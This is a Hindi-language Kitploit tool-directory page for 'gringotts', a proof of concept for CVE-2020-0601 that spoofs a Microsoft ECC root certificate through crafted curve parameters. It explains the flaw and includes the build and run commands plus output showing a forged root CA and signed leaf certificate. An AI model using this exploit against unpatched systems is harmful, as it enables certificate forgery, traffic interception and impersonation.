Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
gringotts — CVE-2020-0601 के लिए अवधारणा का प्रमाण | Kitploit
उपकरण/GitHubGitHub/amlweems/gringotts
एन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणक्रिप्टोग्राफीलर्निंग और शिक्षा
GitHubamlweems/gringotts

gringotts

CVE-2020-0601 के लिए अवधारणा का प्रमाण

रिपॉजिटरी देखें
1126 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-0601 प्रूफ ऑफ कॉन्सेप्ट

CVE-2020-0601 भेद्यता पर आधारित विंडोज 10 में अपना स्वयं का रूट CA और हस्ताक्षरित प्रमाणपत्र बनाने का एक मजेदार प्रूफ ऑफ कॉन्सेप्ट। इस समस्या का आधार यह है कि CertGetCertificateChain() विधि ने रूट प्रमाणपत्र प्राधिकरणों को अनुचित रूप से मान्य किया। चूंकि ट्रस्ट स्टोर में हस्ताक्षर प्रमाणपत्र की खोज महंगी हो सकती है, माइक्रोसॉफ्ट ने एक कैश लागू किया जो प्रदान किए गए रूट प्रमाणपत्र की पब्लिक की का उपयोग करके यह निर्धारित करता था कि यह प्रमाणपत्र पहले ट्रस्ट स्टोर से लोड किया गया था या नहीं। हालाँकि, एलिप्टिक कर्व प्रमाणपत्रों के लिए, SubjectPublicKeyInfo में सिर्फ एक पब्लिक की से अधिक होता है। एलिप्टिक कर्व प्रमाणपत्रों को विशिष्ट एलिप्टिक कर्व को संदर्भित करना होता है (या अपने स्वयं के कस्टम एलिप्टिक कर्व पैरामीटर प्रदान करने होते हैं)। भेद्यता तब होती है जब एलिप्टिक कर्व पैरामीटर कैश लुकअप में शामिल नहीं होते हैं। हम एक मौजूदा पब्लिक की ले सकते हैं, एक नई प्राइवेट की चुन सकते हैं, कर्व पैरामीटर की गणना कर सकते हैं जो इस संयोजन को मान्य बनाते हैं, और एक रूट प्रमाणपत्र बना सकते हैं जो माइक्रोसॉफ्ट के पहले से कमजोर कैश लुकअप को पास करेगा।

यह रिपॉजिटरी "Microsoft EV ECC Root Certificate Authority 2017" विश्वसनीय रूट प्रमाणपत्र को स्पूफ करने और इस नए रूट CA का उपयोग करके एक लीफ प्रमाणपत्र पर हस्ताक्षर करने का प्रदर्शन करती है।

इंटरनेट एक्सप्लोरर में दिखाया गया प्रूफ ऑफ कॉन्सेप्ट प्रमाणपत्र।

बिल्ड

root@kitploit:~
docker build -t gringotts .

उपयोग

root@kitploit:~
$ docker run --rm -it -v "$(pwd):/host" -w /host gringotts
Modified generator:
04bb3de13398a18e1c0d1a2d77ae8cbb9ea358d8c5c075eac51e0c408a0367db2ba187f1ab2febd8859d4c12811563fae6056fef803bff43964ca15c63a28cdc1fdfd38dab9fac20e7a8fa1fae619e576ee5706423414a3c3f8c7e1a2d8adc9cd7
Serializing root.txt and self-sign root certificate
Writing ca/root.pem
Serializing root private key
Writing ca/root-key.pem
read EC key
writing EC key
Generating a RSA private key
...............................................+++++
.........................................................................................+++++
writing new private key to 'ssl/server-key.pem'
-----
Using configuration from /usr/lib/ssl/openssl.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            7c:e6:11:18:1c:5a:14:3e:6f:f0:e2:85:ea:5f:c7:dc:50:a4:b9:b2
        Validity
            Not Before: Apr 30 00:00:00 2018 GMT
            Not After : Aug  1 00:00:00 2020 GMT
        Subject:
            countryName               = GB
            stateOrProvinceName       = Scotland
            localityName              = Highlands
            organizationName          = Gringotts
            organizationalUnitName    = Hogwarts Castle
            commonName                = hogwarts.lf.lc
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:hogwarts.lf.lc
Certificate is to be certified until Aug  1 00:00:00 2020 GMT (184 days)

Write out database with 1 new entries
Data Base Updated
$ tree
.
├── ca
│   ├── root-key.pem
│   └── root.pem
└── ssl
    ├── server-bundle.pem
    ├── server-key.pem
    └── server.pem
टूल डाउनलोड करें